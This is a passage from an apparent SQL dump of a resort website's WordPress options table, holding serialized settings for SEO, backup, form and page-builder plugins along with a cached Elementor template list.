;s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";b:0;s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1484703049;s:13:\"myyoast-oauth\";b:0;s:26:\"semrush_integration_active\";b:1;s:14:\"semrush_tokens\";a:0:{}s:20:\"semrush_country_code\";s:2:\"us\";s:19:\"permalink_structure\";s:12:\"/%postname%/\";s:8:\"home_url\";s:23:\"https://ashbyresort.com\";s:18:\"dynamic_permalinks\";b:0;s:21:\"custom_taxonomy_slugs\";a:3:{s:22:\"elementor_library_type\";s:22:\"elementor_library_type\";s:26:\"elementor_library_category\";s:26:\"elementor_library_category\";s:9:\"ml-slider\";s:9:\"ml-slider\";}s:29:\"enable_enhanced_slack_sharing\";b:1;s:25:\"zapier_integration_active\";b:1;}','yes'),(1245,'wpseo_titles','a:68:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:23:\"is-media-purge-relevant\";b:0;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:7:\"company\";s:25:\"company_or_person_user_id\";b:0;s:17:\"stripcategorybase\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:23:\"post_types-post-maintax\";i:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:23:\"post_types-page-maintax\";i:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:29:\"post_types-attachment-maintax\";i:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;}','yes'),(1246,'wpseo_social','a:19:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:19:\"og_default_image_id\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:21:\"og_frontpage_image_id\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:13:\"wikipedia_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(1250,'wpseo_flush_rewrite','1','yes'),(1256,'fresh_site','0','yes'),(1578,'siteorigin_widgets_active','a:7:{s:6:\"button\";b:1;s:10:\"google-map\";b:1;s:5:\"image\";b:1;s:6:\"slider\";b:1;s:13:\"post-carousel\";b:1;s:6:\"editor\";b:1;s:8:\"features\";b:1;}','yes'),(1579,'widget_sow-features','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1712,'updraft_dropbox','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-1489906a8bf109cd503e9debaa7f6f18\";a:0:{}}}','yes'),(5739,'siteorigin_panels_active_version','2.11.5','yes'),(7660,'updraft_updraftvault','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-65e74c759952fc779411e2a3495711d7\";a:0:{}}}','yes'),(8901,'fmc_admin_notice','a:1:{s:15:\"two_week_review\";a:2:{s:5:\"start\";s:9:\"7/31/2017\";s:3:\"int\";i:14;}}','yes'),(13035,'booking_is_show_system_debug_log','Off','yes'),(13049,'siteorigin_custom_css[vantage]','#masthead .hgroup #header-sidebar .widget-title {color: #ffffff;}\r\n\r\n.tablepress td, .tablepress th { padding: 4px;}','no'),(13050,'siteorigin_custom_css_revisions[vantage]','a:5:{i:1560701617;s:116:\"#masthead .hgroup #header-sidebar .widget-title {color: #ffffff;}\r\n\r\n.tablepress td, .tablepress th { padding: 4px;}\";i:1560701498;s:116:\"#masthead .hgroup #header-sidebar .widget-title {color: #ffffff;}\r\n\r\n.tablepress td, .tablepress th { padding: 8px;}\";i:1560701331;s:115:\"#masthead .hgroup #header-sidebar .widget-title {color: #ffffff;}\r\n\r\n.tablepress td.tablepress th { padding: 4px; }\";i:1560701242;s:101:\"#masthead .hgroup #header-sidebar .widget-title {color: #ffffff;}\r\n\r\n.tablepress th { padding: 4px; }\";i:1509824289;s:65:\"#masthead .hgroup #header-sidebar .widget-title {color: #ffffff;}\";}','no'),(13626,'booking_form_structure_type','vertical','yes'),(13627,'booking_menu_go_pro','show','yes'),(16977,'ms_hide_all_ads_until','1574534819','yes'),(16978,'metaslider_tour_cancelled_on','step_add_slide','yes'),(17176,'_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109','1518791385','no'),(17513,'ms_ads_first_seen_on','1519523172','yes'),(17839,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(17840,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(17841,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(17842,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(17843,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(17874,'updraft_onedrive','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(17875,'updraft_azure','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(17876,'updraft_sftp','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(17877,'updraft_googlecloud','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(17878,'updraft_backblaze','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(17879,'updraft_webdav','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(17913,'wpclone_directory_scan','a:4:{s:6:\"dbsize\";s:7:\"5.81 MB\";s:4:\"size\";s:9:\"975.69 MB\";s:5:\"files\";i:8917;s:4:\"time\";i:1520377058;}','yes'),(17933,'fmc_subscribe_done','1','yes'),(17936,'wpforms_preview_page','612','yes'),(17937,'wpforms_version','1.4.4.1','yes'),(17938,'wpforms_activated','a:1:{s:4:\"lite\";i:1520389079;}','yes'),(17941,'widget_wpforms-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(17942,'_amn_wpforms-lite_last_checked','1555632000','yes'),(17943,'wpforms_review','a:2:{s:4:\"time\";i:1522677644;s:9:\"dismissed\";b:1;}','yes'),(18117,'_elementor_installed_time','1520644137','yes'),(18118,'elementor_remote_info_templates_data','a:138:{i:0;a:14:{s:2:\"id\";s:3:\"147\";s:5:\"title\";s:20:\"Homepage &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0004.png\";s:12:\"tmpl_created\";s:10:\"1470829868\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/homepage-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"App\",\"Homepage\"]\";s:10:\"menu_order\";s:1:\"2\";s:16:\"popularity_index\";s:1:\"1\";s:11:\"trend_index\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:1;a:14:{s:2:\"id\";s:4:\"2402\";s:5:\"title\";s:32:\"Homepage &#8211; Interior Design\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2017/09/Interior.png\";s:12:\"tmpl_created\";s:10:\"1506441447\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:193:\"[\"Architecture\",\"building\",\"business\",\"Creative\",\"exterior design\",\"furniture design\",\"Gallery\",\"garden design\",\"house\",\"interior design\",\"landscape design\",\"multipurpose\",\"portfolio\",\"studio\"]\";s:10:\"menu_order\";s:1:\"3\";s:16:\"popularity_index\";s:2:\"41\";s:11:\"trend_index\";s:2:\"55\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:2;a:14:{s:2:\"id\";s:3:\"777\";s:5:\"title\";s:28:\"Homepage &#8211; Coffee Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/01/rest-home.jpg\";s:12:\"tmpl_created\";s:10:\"1485273092\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/homepage-coffee-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:41:\"[\"Coffee\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";s:1:\"4\";s:16:\"popularity_index\";s:2:\"39\";s:11:\"trend_index\";s:2:\"72\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:3;a:14:{s:2:\"id\";s:4:\"2404\";s:5:\"title\";s:24:\"Homepage &#8211; Product\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/09/product.png\";s:12:\"tmpl_created\";s:10:\"1506441452\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:103:\"[\"business\",\"colorful\",\"ecommerce\",\"flat\",\"mobile\",\"modern\",\"responsive\",\"retina\",\"Shop\",\"woocommerce\"]\";s:10:\"menu_order\";s:1:\"5\";s:16:\"popularity_index\";s:2:\"43\";s:11:\"trend_index\";s:2:\"89\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:4;a:14:{s:2:\"id\";s:3:\"519\";s:5:\"title\";s:24:\"Homepage &#8211; Fitness\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0023.png\";s:12:\"tmpl_created\";s:10:\"1477388808\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-fitness/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Fitness\",\"Gym\",\"Health\",\"Homepage\",\"Sport\"]\";s:10:\"menu_order\";s:1:\"6\";s:16:\"popularity_index\";s:1:\"6\";s:11:\"trend_index\";s:1:\"6\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:5;a:14:{s:2:\"id\";s:3:\"492\";s:5:\"title\";s:25:\"Homepage &#8211; Law firm\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0024.png\";s:12:\"tmpl_created\";s:10:\"1477388365\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-law-firm/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Firm\",\"Homepage\",\"Law\"]\";s:10:\"menu_order\";s:1:\"7\";s:16:\"popularity_index\";s:1:\"4\";s:11:\"trend_index\";s:1:\"5\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:6;a:14:{s:2:\"id\";s:3:\"225\";s:5:\"title\";s:27:\"Homepage &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0016.png\";s:12:\"tmpl_created\";s:10:\"1470829872\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Homepage\",\"Restaurant\"]\";s:10:\"menu_order\";s:1:\"8\";s:16:\"popularity_index\";s:1:\"2\";s:11:\"trend_index\";s:1:\"2\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:7;a:14:{s:2:\"id\";s:4:\"3451\";s:5:\"title\";s:39:\"Homepage &#8211; Goodness meal services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/11/goodness-featured-image.png\";s:12:\"tmpl_created\";s:10:\"1512054116\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/homepage-goodness-meal-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"9\";s:16:\"popularity_index\";s:2:\"57\";s:11:\"trend_index\";s:3:\"180\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:8;a:14:{s:2:\"id\";s:4:\"2152\";s:5:\"title\";s:26:\"Homepage &#8211; Cake Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-home.png\";s:12:\"tmpl_created\";s:10:\"1499774132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/homepage-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Cake\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";s:2:\"10\";s:16:\"popularity_index\";s:2:\"67\";s:11:\"trend_index\";s:3:\"182\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:9;a:14:{s:2:\"id\";s:4:\"1068\";s:5:\"title\";s:27:\"Homepage &#8211; Copywriter\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/copywriter.png\";s:12:\"tmpl_created\";s:10:\"1488805928\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-copywriter/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Copywriter\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"11\";s:16:\"popularity_index\";s:2:\"44\";s:11:\"trend_index\";s:3:\"161\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:10;a:14:{s:2:\"id\";s:3:\"181\";s:5:\"title\";s:23:\"Homepage &#8211; Agency\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0019.png\";s:12:\"tmpl_created\";s:10:\"1470826567\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/homepage-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"12\";s:16:\"popularity_index\";s:1:\"3\";s:11:\"trend_index\";s:1:\"4\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:11;a:14:{s:2:\"id\";s:3:\"463\";s:5:\"title\";s:22:\"Homepage &#8211; Study\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0022.png\";s:12:\"tmpl_created\";s:10:\"1477388340\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/homepage-study/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Education\",\"Homepage\",\"Study\"]\";s:10:\"menu_order\";s:2:\"13\";s:16:\"popularity_index\";s:1:\"7\";s:11:\"trend_index\";s:1:\"3\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:12;a:14:{s:2:\"id\";s:4:\"2813\";s:5:\"title\";s:32:\"Homepage &#8211; Creative Agency\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/11/Creative-Agency-–-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1509615049\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-creative-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"14\";s:16:\"popularity_index\";s:2:\"42\";s:11:\"trend_index\";s:2:\"76\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:13;a:14:{s:2:\"id\";s:3:\"728\";s:5:\"title\";s:33:\"Homepage &#8211; Delivery Company\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/01/delivery-company-home-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485269993\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/homepage-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Delivery\",\"Homepage\"]\";s:10:\"menu_order\";s:2:\"15\";s:16:\"popularity_index\";s:2:\"45\";s:11:\"trend_index\";s:3:\"217\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:14;a:14:{s:2:\"id\";s:4:\"2403\";s:5:\"title\";s:29:\"Homepage &#8211; Luxury Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/09/Hotel.png\";s:12:\"tmpl_created\";s:10:\"1506441428\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/homepage-luxury-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"16\";s:16:\"popularity_index\";s:2:\"58\";s:11:\"trend_index\";s:3:\"221\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:15;a:14:{s:2:\"id\";s:4:\"1903\";s:5:\"title\";s:20:\"One Page &#8211; Spa\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/06/spa.png\";s:12:\"tmpl_created\";s:10:\"1496822325\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/one-page-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:132:\"[\"beauty\",\"care\",\"girly\",\"hair\",\"Health\",\"hospitality\",\"massage\",\"medical\",\"parlor\",\"physiotherapy\",\"salon\",\"spa\",\"wellness\",\"yoga\"]\";s:10:\"menu_order\";s:2:\"17\";s:16:\"popularity_index\";s:2:\"47\";s:11:\"trend_index\";s:3:\"109\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:16;a:14:{s:2:\"id\";s:4:\"2123\";s:5:\"title\";s:33:\"One Page &#8211; Architect Office\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/06/architect.png\";s:12:\"tmpl_created\";s:10:\"1499772989\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/one-page-architect-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"18\";s:16:\"popularity_index\";s:2:\"10\";s:11:\"trend_index\";s:1:\"8\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:17;a:14:{s:2:\"id\";s:4:\"1888\";s:5:\"title\";s:32:\"One Page &#8211; Creative Meetup\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2017/06/creative-meetup.png\";s:12:\"tmpl_created\";s:10:\"1496822319\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/one-page-creative-meetup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"19\";s:16:\"popularity_index\";s:2:\"49\";s:11:\"trend_index\";s:3:\"178\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:18;a:14:{s:2:\"id\";s:4:\"1880\";s:5:\"title\";s:24:\"One Page &#8211; Wedding\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/06/wedding.png\";s:12:\"tmpl_created\";s:10:\"1496822317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/one-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"bride\",\"ceremony\",\"cute\",\"event\",\"fancy\",\"girly\",\"groom\",\"guestbook\",\"marriage\"]\";s:10:\"menu_order\";s:2:\"20\";s:16:\"popularity_index\";s:3:\"107\";s:11:\"trend_index\";s:3:\"300\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:19;a:14:{s:2:\"id\";s:4:\"1891\";s:5:\"title\";s:35:\"One Page &#8211; Textile Convention\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/06/textile-meetup.png\";s:12:\"tmpl_created\";s:10:\"1496822323\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/one-page-textile-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"21\";s:16:\"popularity_index\";s:2:\"87\";s:11:\"trend_index\";s:3:\"196\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:20;a:14:{s:2:\"id\";s:4:\"1885\";s:5:\"title\";s:29:\"One Page &#8211; Yacht Rental\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/06/yacht-home.png\";s:12:\"tmpl_created\";s:10:\"1496822321\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/one-page-yacht-rental/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"22\";s:16:\"popularity_index\";s:2:\"46\";s:11:\"trend_index\";s:3:\"222\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:21;a:14:{s:2:\"id\";s:4:\"2723\";s:5:\"title\";s:34:\"Portfolio &#8211; Graphic Designer\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/11/Graphic-Designer-–-Portfolio.png\";s:12:\"tmpl_created\";s:10:\"1509633883\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/portfolio-graphic-designer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"23\";s:16:\"popularity_index\";s:2:\"52\";s:11:\"trend_index\";s:3:\"160\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:22;a:14:{s:2:\"id\";s:4:\"2145\";s:5:\"title\";s:30:\"About &#8211; Delivery Company\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-about.png\";s:12:\"tmpl_created\";s:10:\"1499774125\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/about-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:10:\"[\"moving\"]\";s:10:\"menu_order\";s:2:\"24\";s:16:\"popularity_index\";s:2:\"75\";s:11:\"trend_index\";s:3:\"267\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:23;a:14:{s:2:\"id\";s:4:\"2155\";s:5:\"title\";s:23:\"About &#8211; Cake Shop\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-about.png\";s:12:\"tmpl_created\";s:10:\"1499774130\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/about-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:8:\"[\"Food\"]\";s:10:\"menu_order\";s:2:\"25\";s:16:\"popularity_index\";s:2:\"99\";s:11:\"trend_index\";s:3:\"348\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:24;a:14:{s:2:\"id\";s:4:\"1085\";s:5:\"title\";s:21:\"About &#8211; 